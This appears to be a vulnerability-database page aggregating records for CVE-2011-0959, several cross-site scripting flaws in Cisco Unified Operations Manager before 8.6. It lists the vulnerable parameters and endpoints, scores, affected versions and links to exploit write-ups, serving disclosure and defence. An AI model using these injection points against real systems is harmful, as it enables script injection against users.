        "id": "VHN-48904"
      },
      {
        "date": "2011-05-18T00:00:00",
        "db": "BID",
        "id": "47901"
      },
      {
        "date": "2011-12-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-003127"
      },
      {
        "date": "2011-05-18T14:17:13",
        "db": "PACKETSTORM",
        "id": "101518"
      },
      {
        "date": "2011-05-20T05:48:10",
        "db": "PACKETSTORM",
        "id": "101570"
      },
      {
        "date": "2011-05-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201105-206"
      },
      {
        "date": "2011-05-20T22:55:02.907000",
        "db": "NVD",
        "id": "CVE-2011-0959"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-05-19T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-1912"
      },
      {
        "date": "2017-08-17T00:00:00",
        "db": "VULHUB",
        "id": "VHN-48904"
      },
      {
        "date": "2011-05-18T00:00:00",
        "db": "BID",
        "id": "47901"
      },
      {
        "date": "2011-12-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-003127"
      },
      {
        "date": "2011-05-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201105-206"
      },
      {
        "date": "2024-02-14T01:17:43.863000",
        "db": "NVD",
        "id": "CVE-2011-0959"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "101518"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201105-206"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco Unified Operations Manager Cross-Site Scripting Vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-1912"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201105-206"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201105-206"
      }
    ],
    "trust": 0.6
  }
}

GSD-2011-0959

Vulnerability from gsd - Updated: 2023-12-13 01:19

Details

Aliases

CVE-2011-0959

Aliases

CVE-2011-0959

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2011-0959",
    "description": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716.",
    "id": "GSD-2011-0959",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2011-0959"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2011-0959"
      ],
      "details": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716.",
      "id": "GSD-2011-0959",
      "modified": "2023-12-13T01:19:04.275958Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@cisco.com",
        "ID": "CVE-2011-0959",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23085",
            "refsource": "CONFIRM",
            "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23085"
          },
          {
            "name": "http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf",
            "refsource": "MISC",
            "url": "http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf"
          },
          {
            "name": "20110518 Cisco Unified Operations Manager Multiple Vulnerabilities - SOS-11-006",
            "refsource": "FULLDISC",
            "url": "http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html"
          },
          {
            "name": "17304",
            "refsource": "EXPLOIT-DB",
            "url": "http://www.exploit-db.com/exploits/17304"
          },
          {
            "name": "cisco-uom-multiple-xss(67521)",
            "refsource": "XF",
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67521"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.0.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "8.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@cisco.com",
          "ID": "CVE-2011-0959"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-79"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20110518 Cisco Unified Operations Manager Multiple Vulnerabilities - SOS-11-006",
              "refsource": "FULLDISC",
              "tags": [
                "Exploit"
              ],
              "url": "http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html"
            },
            {
              "name": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23085",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23085"
            },
            {
              "name": "http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf",
              "refsource": "MISC",
              "tags": [
                "Exploit"
              ],
              "url": "http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf"
            },
            {
              "name": "17304",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit"
              ],
              "url": "http://www.exploit-db.com/exploits/17304"
            },
            {
              "name": "cisco-uom-multiple-xss(67521)",
              "refsource": "XF",
              "tags": [],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67521"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 8.6,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": true
        }
      },
      "lastModifiedDate": "2017-08-17T01:33Z",
      "publishedDate": "2011-05-20T22:55Z"
    }
  }
}

GHSA-5CGR-RXFV-WJGV

Vulnerability from github – Published: 2022-05-17 02:01 – Updated: 2022-05-17 02:01

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2011-0959"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2011-05-20T22:55:00Z",
    "severity": "MODERATE"
  },
  "details": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716.",
  "id": "GHSA-5cgr-rxfv-wjgv",
  "modified": "2022-05-17T02:01:32Z",
  "published": "2022-05-17T02:01:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-0959"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67521"
    },
    {
      "type": "WEB",
      "url": "http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html"
    },
    {
      "type": "WEB",
      "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23085"
    },
    {
      "type": "WEB",
      "url": "http://www.exploit-db.com/exploits/17304"
    },
    {
      "type": "WEB",
      "url": "http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

CERTA-2011-AVI-303

Vulnerability from certfr_avis - Published: - Updated:

De multiples vulnérabilités dans Cisco Unified Operations Manager permettent des injections de code indirectes à distance (XSS) et une injection SQL.

Description

De multiples vulnérabilités ont été découvertes dans Cisco Unified Operations Manager. Elles peuvent être exploitées par une personne malveillante distante pour effectuer des injections de code indirectes à distance (XSS) ou une injection SQL.

Solution

Se référer aux bulletins de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Cisco Unified Operations Manager 8.5 et versions antérieures.

Impacted products

	Vendor	Product	Description

References

Title

Publication Time

Tags

Bulletin de sécurité Cisco IntelliShield Id : 23085, 23086 et 23087 du 18 mai 2011	None	vendor-advisory
Bulletin de sécurité Cisco IntelliShield Id : 23086 du 18 mai 2011 :	-	other
Bulletin de sécurité Cisco IntelliShield Id : 23087 du 18 mai 2011 :	-	other
Bulletin de sécurité Cisco IntelliShield Id : 23085 du 18 mai 2011 :	-	other

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [],
  "affected_systems_content": "\u003cp\u003eCisco Unified Operations Manager 8.5 et  versions ant\u00e9rieures.\u003c/p\u003e",
  "content": "## Description\n\nDe multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans Cisco Unified\nOperations Manager. Elles peuvent \u00eatre exploit\u00e9es par une personne\nmalveillante distante pour effectuer des injections de code indirectes \u00e0\ndistance (XSS) ou une injection SQL.\n\n## Solution\n\nSe r\u00e9f\u00e9rer aux bulletins de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2011-0962",
      "url": "https://www.cve.org/CVERecord?id=CVE-2011-0962"
    },
    {
      "name": "CVE-2011-0960",
      "url": "https://www.cve.org/CVERecord?id=CVE-2011-0960"
    },
    {
      "name": "CVE-2011-0959",
      "url": "https://www.cve.org/CVERecord?id=CVE-2011-0959"
    }
  ],
  "links": [
    {
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco IntelliShield Id : 23086 du 18    mai 2011 :",
      "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23086"
    },
    {
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco IntelliShield Id : 23087 du 18    mai 2011 :",
      "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23087"
    },
    {
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco IntelliShield Id : 23085 du 18    mai 2011 :",
      "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23085"
    }
  ],
  "reference": "CERTA-2011-AVI-303",
  "revisions": [
    {
      "description": "version initiale.",
      "revision_date": "2011-05-20T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Injection de code indirecte \u00e0 distance"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s dans Cisco Unified Operations Manager\npermettent des injections de code indirectes \u00e0 distance (\u003cspan\nclass=\"textit\"\u003eXSS\u003c/span\u003e) et une injection \u003cspan\nclass=\"textit\"\u003eSQL\u003c/span\u003e.\n",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans Cisco Unified Operations Manager",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco IntelliShield Id : 23085, 23086 et 23087 du 18 mai 2011",
      "url": null
    }
  ]
}

CERTA-2011-AVI-303

Vulnerability from certfr_avis - Published: - Updated:

De multiples vulnérabilités dans Cisco Unified Operations Manager permettent des injections de code indirectes à distance (XSS) et une injection SQL.

Description

Solution

Se référer aux bulletins de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Cisco Unified Operations Manager 8.5 et versions antérieures.

Impacted products

	Vendor	Product	Description

References

Title

Publication Time

Tags

Bulletin de sécurité Cisco IntelliShield Id : 23085, 23086 et 23087 du 18 mai 2011	None	vendor-advisory
Bulletin de sécurité Cisco IntelliShield Id : 23086 du 18 mai 2011 :	-	other
Bulletin de sécurité Cisco IntelliShield Id : 23087 du 18 mai 2011 :	-	other
Bulletin de sécurité Cisco IntelliShield Id : 23085 du 18 mai 2011 :	-	other

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [],
  "affected_systems_content": "\u003cp\u003eCisco Unified Operations Manager 8.5 et  versions ant\u00e9rieures.\u003c/p\u003e",
  "content": "## Description\n\nDe multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans Cisco Unified\nOperations Manager. Elles peuvent \u00eatre exploit\u00e9es par une personne\nmalveillante distante pour effectuer des injections de code indirectes \u00e0\ndistance (XSS) ou une injection SQL.\n\n## Solution\n\nSe r\u00e9f\u00e9rer aux bulletins de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2011-0962",
      "url": "https://www.cve.org/CVERecord?id=CVE-2011-0962"
    },
    {
      "name": "CVE-2011-0960",
      "url": "https://www.cve.org/CVERecord?id=CVE-2011-0960"
    },
    {
      "name": "CVE-2011-0959",
      "url": "https://www.cve.org/CVERecord?id=CVE-2011-0959"
    }
  ],
  "links": [
    {
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco IntelliShield Id : 23086 du 18    mai 2011 :",
      "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23086"
    },
    {
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco IntelliShield Id : 23087 du 18    mai 2011 :",
      "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23087"
    },
    {
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco IntelliShield Id : 23085 du 18    mai 2011 :",
      "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23085"
    }
  ],
  "reference": "CERTA-2011-AVI-303",
  "revisions": [
    {
      "description": "version initiale.",
      "revision_date": "2011-05-20T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Injection de code indirecte \u00e0 distance"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s dans Cisco Unified Operations Manager\npermettent des injections de code indirectes \u00e0 distance (\u003cspan\nclass=\"textit\"\u003eXSS\u003c/span\u003e) et une injection \u003cspan\nclass=\"textit\"\u003eSQL\u003c/span\u003e.\n",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans Cisco Unified Operations Manager",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco IntelliShield Id : 23085, 23086 et 23087 du 18 mai 2011",
      "url": null
    }
  ]
}

FKIE_CVE-2011-0959

Vulnerability from fkie_nvd - Published: 2011-05-20 22:55 - Updated: 2025-04-11 00:51

Severity ?

Summary

References

URL	Tags
psirt@cisco.com	http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html	Exploit
psirt@cisco.com	http://tools.cisco.com/security/center/viewAlert.x?alertId=23085	Vendor Advisory
psirt@cisco.com	http://www.exploit-db.com/exploits/17304	Exploit
psirt@cisco.com	http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf	Exploit, URL Repurposed
psirt@cisco.com	https://exchange.xforce.ibmcloud.com/vulnerabilities/67521
af854a3a-2127-422b-91ae-364da2661108	http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://tools.cisco.com/security/center/viewAlert.x?alertId=23085	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.exploit-db.com/exploits/17304	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf	Exploit, URL Repurposed
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/67521

Impacted products

Vendor	Product	Version
cisco	unified_operations_manager	*
cisco	unified_operations_manager	1.1
cisco	unified_operations_manager	2.0
cisco	unified_operations_manager	2.0.1
cisco	unified_operations_manager	2.0.2
cisco	unified_operations_manager	2.0.3
cisco	unified_operations_manager	2.1
cisco	unified_operations_manager	2.2
cisco	unified_operations_manager	2.3
cisco	unified_operations_manager	8.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:cisco:unified_operations_manager:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "690FA80D-A157-4D4E-980D-C9AA0009D853",
              "versionEndIncluding": "8.5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:cisco:unified_operations_manager:1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C5510F4F-93C9-4722-97F5-37A05B48C23D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:cisco:unified_operations_manager:2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C73FD728-7A22-4248-B4DA-62AB2704A411",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:cisco:unified_operations_manager:2.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD2DF29A-4E30-442C-BB14-F22D955B112A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:cisco:unified_operations_manager:2.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "4CA03A21-13EF-476E-892B-D0A494779594",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:cisco:unified_operations_manager:2.0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "107A78CC-8943-4D33-BE60-CBFC72FE405D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:cisco:unified_operations_manager:2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "930EA844-7016-4EC3-833D-70D1B1DE6DA0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:cisco:unified_operations_manager:2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "5CA3DB6A-A1D4-4CB4-A62D-3269E27094D9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:cisco:unified_operations_manager:2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "D63D2042-C271-4671-9858-2DE4709BAD19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:cisco:unified_operations_manager:8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3BF00348-D8E9-4FC0-A6EA-7B16707441A3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades de ejecuci\u00f3n de secuencias de comandos en sitios cruzados (XSS) en Cisco Unified Operations Manager (CUOM) antes de v8.6, permite a atacantes remotos inyectar secuencias de comandos web o HTML a trav\u00e9s de (1) el par\u00e1metro extn de iptm/advancedfind.do, (2) el par\u00e1metro deviceInstanceName de iptm/ddv.do, el (3) cmd o (4) el par\u00e1metro group de iptm/eventmon, el par\u00e1metro (5) clusterName o (6) deviceName de iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, o el par\u00e1metro (7) ccmName o (8) clusterName de iptm/logicalTopo.do, tambi\u00e9n conocido como Bug ID CSCtn61716."
    }
  ],
  "id": "CVE-2011-0959",
  "lastModified": "2025-04-11T00:51:21.963",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2011-05-20T22:55:02.907",
  "references": [
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Exploit"
      ],
      "url": "http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html"
    },
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23085"
    },
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/17304"
    },
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Exploit",
        "URL Repurposed"
      ],
      "url": "http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf"
    },
    {
      "source": "psirt@cisco.com",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67521"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23085"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/17304"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "URL Repurposed"
      ],
      "url": "http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67521"
    }
  ],
  "sourceIdentifier": "psirt@cisco.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Tags

Taxonomy of the tags.

All sightings related to this event Export sightings related to this event

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2011-0959 (GCVE-0-2011-0959)

VAR-201105-0046

GSD-2011-0959

GHSA-5CGR-RXFV-WJGV

CERTA-2011-AVI-303

Description

Solution

CERTA-2011-AVI-303

Description

Solution

FKIE_CVE-2011-0959

Tags

Sightings

Nomenclature